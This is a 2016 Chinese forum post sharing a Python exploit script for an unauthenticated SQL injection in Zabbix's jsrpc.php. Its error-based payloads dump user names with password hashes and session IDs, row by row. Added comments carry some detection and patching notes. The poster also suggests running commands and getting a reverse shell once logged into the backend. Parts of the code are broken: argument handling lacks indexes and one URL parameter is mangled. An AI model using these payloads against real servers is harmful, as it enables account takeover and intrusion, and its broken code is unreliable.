zabbix注入利用脚本
本帖最后由 wuyan 于 2016-8-18 19:27 编辑。没什么好讲的,分析的文章也不想写了,就是 insert 注入。
#/usr/bin/python
#*-*coding=utf-8*-*
import requests
import re
import sys
'''
===getpass payloads===
1./jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2 and (select 1 from (select count(*),concat(floor(rand(0)*2), (select concat(alias,0x3a,passwd) from zabbix.users limit 1,1))x from information_schema.character_sets group by x)y) &updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids=23297&action=showlatest&filter=&filter_task=&mark_color=1
2./jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,(select(select+concat(0x7e,alias,0x7e,passwd,0x7e))+from+zabbix.users+LIMIT+0,1),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
===session 获取===
1./jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,(select(select+concat(0x7e,sessionid,0x7e))+from+sessions+LIMIT+0,1),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
'''
def getpass(url,num):
# Issue one unauthenticated GET to jsrpc.php (type=9&method=screen.get). The SQL
# fragment rides in the profileIdx2 query parameter; the selected users row
# (alias:passwd) is wrapped in 0x7e0x7e ... 0x7e0x7e, i.e. "~~...~~", which is the
# marker filter() later matches on. `num` selects the row via "limit %s,1".
# sid and timestamp are hard-coded; they are not validated for this request path.
# Presumably the value surfaces through a MySQL error message (count(*)/group by on
# floor(rand(0)*2)) - confirm against the server response.
# Detection note: SQL keywords or parentheses inside profileIdx2 on jsrpc.php are a
# reliable signature in web-server / WAF logs; the defensive fix is the vendor patch.
payloads = '/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&\
hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2 and (select 2333 from (select count(*),concat(floor\
(rand(0)*2), (select concat(0x7e,0x7e,alias,0x3a,passwd,0x7e,0x7e) from users limit %s,1))x from information_schema.character_sets \
group by x)y) &updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids=23297&action=\
showlatest&filter=&filter_task=&mark_color=1' % str(num)
# `url` is used verbatim as the prefix; the path above is simply appended.
tempurl = url + payloads
# Raw response body (str in Python 2); `req` is an unused second name for it.
response = req = requests.get(tempurl).content
return response
def filter(content):
# Print every "~~...~~" span found in a jsrpc.php response body.
# NOTE: the name shadows the builtin filter() for the rest of this module.
# Returns True unless re.findall raises. An empty match list is still True, so the
# callers' loops in __main__ do not stop on a missing row and run to their
# 999-request limit - a burst of identical jsrpc.php requests that is easy to alert on.
try:
result = re.findall(r"~~(.*?)~~",content)
print result
return True
# Python 2 except syntax; `e` is never used.
except Exception, e:
return False
def getsession(url,num):
# Same request shape as getpass(), but the subquery reads sessionid from the
# sessions table instead of alias:passwd from users; `num` again feeds "limit %s,1".
# The value is wrapped in "~~...~~" so filter() can extract it.
# Mitigation note: if this endpoint was reachable before patching, session ids in
# that table should be treated as exposed - consider invalidating existing sessions
# after applying the vendor fix (hedged: depends on the deployment's session policy).
payloads = '/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&\
hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2 and (select 2333 from (select count(*),concat(floor\
(rand(0)*2), (select concat(0x7e,0x7e,sessionid,0x7e,0x7e) from sessions limit %s,1))x from information_schema.character_sets \
group by x)y) &updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids=23297&action=\
showlatest&filter=&filter_task=&mark_color=1' % str(num)
# `url` is used verbatim as the prefix; the path above is simply appended.
tempurl = url + payloads
# Raw response body; `req` is an unused alias of the same value.
response = req = requests.get(tempurl).content
return response
def usage():
# Print the two supported invocations (Python 2 print statements).
print " usage1: python zabbix.py xxx.com passwd"
print " usage2: python zabbix.py xxx.com session\n"
if __name__ == '__main__':
# ASCII banner printed on every run.
logo = '''\n
_____ _ _ _ _____ _
|__/__ _| |__ | |__ (_)__|___| ____| | __
/ // _` | '_ \| '_ \| \ \/ / |_ | | | |/ __| |/ /
/ /| (_| | |_) | |_) | |><|_|| |_| | (__| <
/____\__,_|_.__/|_.__/|_/_/\_\_| \__,_|\___|_|\_\
\n**************coded by bsmali4 2016-8-16*****************
'''
print logo
# Expects exactly two arguments after the script name (see usage()).
if len(sys.argv) != 3:
usage()
else:
# Intended to be the target (with trailing '/' removed) and the mode, as the
# usage text describes.
host = sys.argv.strip('/')
method = sys.argv
# 'passwd' walks users rows, 'session' walks sessions rows, one request per row.
# The loop only stops early when filter() returns False, which happens only if
# re.findall raises, so in practice each mode issues up to 999 requests.
if method == 'passwd':
for i in range (0,999):
response = getpass(host,i)
if not filter(response):
break
elif method == 'session':
for i in range(0,999):
response = getsession(host,i)
if not filter(response):
break
登陆后台后可以直接执行命令,反弹shell什么的是极好的
这样真的好么,信不信我也直接丢个汇编代码然后说没啥好写的;P 卧槽,居然没人来捧场。